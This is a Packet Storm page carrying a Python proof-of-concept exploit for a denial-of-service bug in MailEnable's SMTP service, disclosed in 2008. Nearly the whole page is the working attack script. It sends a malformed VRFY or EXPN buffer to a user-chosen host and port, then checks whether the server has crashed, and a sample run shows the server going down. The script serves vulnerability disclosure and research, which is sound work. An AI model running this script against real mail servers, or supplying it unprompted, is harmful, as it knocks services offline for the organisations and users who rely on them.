MailEnable SMTP server VRFY/EXPN command buffer overflow denial of service exploit.
a0705361ac29e9fb40f8aeae9a11b264b6c3114b26f03df112fc86cb7c8a608d#!/usr/bin/python
##########################################################################
#
# MailEnable SMTP Service VRFY/EXPN Command Buffer Overflow ( DoS )
# Bug discovered by Matteo Memelli aka ryujin
# http://www.gray-world.net http://www.be4mind.com
#
# Affected Versions : Standard Edition all versions
# Professional Edition all versions
# Enterprise Edition all versions
# Tested on OS : Windows 2000 SP4 English
# Windows 2003 Standard Edition Italian
# Windows XP SP2 English
# Discovery Date : 02/24/2008
# Initial vendor notification : 03/06/2008
# Coordinated public disclosure: 03/11/2008
#
# CONGRATS TO THE MAILENABLE TEAM: VERY FAST IN PATCHING AND ANSWERING!!
#
#-------------------------------------------------------------------------
#
# THX TO muts at offensive-security.com :
# I'll promise you: next time i'll find an easier one and get my shell :P
#
#-------------------------------------------------------------------------
##########################################################################
#
# matte@badrobot:~$ ./mailenable_smtp.py -H 192.168.1.245 -P 25 -c VRFY
# [+] Connecting to 192.168.1.245 on port 25
# 220 test.local ESMTP MailEnable Service, Version: 0-3.13- ready at \
# 03/06/08 13:20:49
#
# [+] Sending evilbuffer...
# [+] Waiting 10 secs before reconnecting...
# [+] Reconnecting...
# [+] SMTP Server died!
# [+] Connection refused
#
##########################################################################
from socket import *
from optparse import OptionParser
import sys, time
usage = "%prog -H TARGET_HOST -P TARGET_PORT [-c COMMAND]"
parser = OptionParser(usage=usage)
parser.add_option("-H", "--target_host", type="string",
action="store", dest="HOST",
help="Target Host")
parser.add_option("-P", "--target_port", type="int",
action="store", dest="PORT",
help="Target Port")
parser.add_option("-c", "--command", type="string",
action="store", dest="COMMAND",
help="Command: VRFY or EXPN ; defualt VRFY")
(options, args) = parser.parse_args()
HOST = options.HOST
PORT = options.PORT
COMMAND = options.COMMAND
if not (HOST and PORT):
parser.print_help()
sys.exit()
if not COMMAND:
COMMAND = 'VRFY'
print "[+] Using default command VRFY"
else:
COMMAND = COMMAND.upper().strip()
if COMMAND != 'VRFY' and COMMAND != 'EXPN':
print 'Invalid command "%s" Choose between VRFY or EXPN!' % COMMAND
sys.exit()
evilbuf = '%s \nSMTPISGONNADIE\r\n' % COMMAND
s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
print "[+] Connecting to %s on port %d" % (HOST, PORT)
print s.recv(1024)
print "[+] Sending evilbuffer..."
s.send(evilbuf)
s.close()
print "[+] Waiting 10 secs before reconnecting..."
time.sleep(10)
try:
s = socket(AF_INET, SOCK_STREAM)
print "[+] Reconnecting..."
s.connect((HOST, PORT))
except error, e:
print "[+] SMTP Server died!"
print "[+] %s" % e[1]
else:
print "[-] SMTP Server is still up"
print "[-] This probably means that is not vulnerable"
s.close()
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed